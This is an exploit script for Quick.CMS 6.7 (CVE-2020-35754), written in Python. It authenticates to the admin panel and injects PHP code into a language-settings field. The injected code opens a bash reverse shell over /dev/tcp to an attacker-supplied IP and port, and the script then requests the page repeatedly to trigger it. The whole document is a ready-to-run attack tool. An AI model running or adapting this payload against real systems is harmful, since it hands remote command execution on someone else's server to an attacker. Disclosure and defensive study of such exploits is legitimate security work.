# Exploit Title: Quick.CMS 6.7 - Remote Code Execution (Authenticated) # Date: 2020-12-28 # Exploit Author: mari0x00 # Vendor Homepage: https://opensolution.org/ # Software Link: https://opensolution.org/download/?sFile=Quick.Cms_v6.7-pl.zip # Description: https://secator.pl/index.php/2021/01/28/cve-2020-35754-authenticated-rce-in-quick-cms-and-quick-cart/ # Version: <= 6.7 # CVE : CVE-2020-35754 #!/usr/bin/python3 import requests import sys from termcolor import colored from time import sleep print(colored('''###########################################################''',"red")) print(colored('''###### Quick.CMS authenticated RCE by mari0x00 #######''',"red")) print(colored('''###########################################################''',"red")) print("") if len(sys.argv) != 6: print((colored("[~] Usage : python3 quickpwn.py <url> <username> <password> <IP> <PORT>","red"))) print((colored("[~] Example: python3 quickpwn.py http://192.168.101.105/quick.cms/ john@example.com pass123 192.168.101.101 4444","red"))) exit() url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] IP = sys.argv[4] PORT = sys.argv[5] #Start session s = requests.Session() headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'} #Authenticate print((colored("[+] Attempting user login","blue"))) login_data = { "sEmail": username, "sPass": password, "bAcceptLicense": "1", "iAcceptLicense": "true" } login = s.post(url+"admin.php?p=login", login_data, headers=headers) sleep(0.5) #Exploit print((colored("[+] Adding shell command","blue"))) payload = "Back end\\\"; system('/bin/bash -c \\'bash -i >& /dev/tcp/" + IP + "/" + PORT + " 0>&1\\''); //" shell = { "sOption": "save", "Back_end_only": payload } exploit = s.post(url+"admin.php?p=languages&sLangEdit=en", shell, headers=headers) sleep(1) #Triggering reverse shell (three times just in case) print("") print((colored("[+] Triggering the shell. Go nuts!","green"))) r = s.get(url+"admin.php?p=languages", headers=headers) sleep(1) r = s.get(url+"admin.php?p=languages", headers=headers) sleep(1) r = s.get(url+"admin.php?p=languages", headers=headers)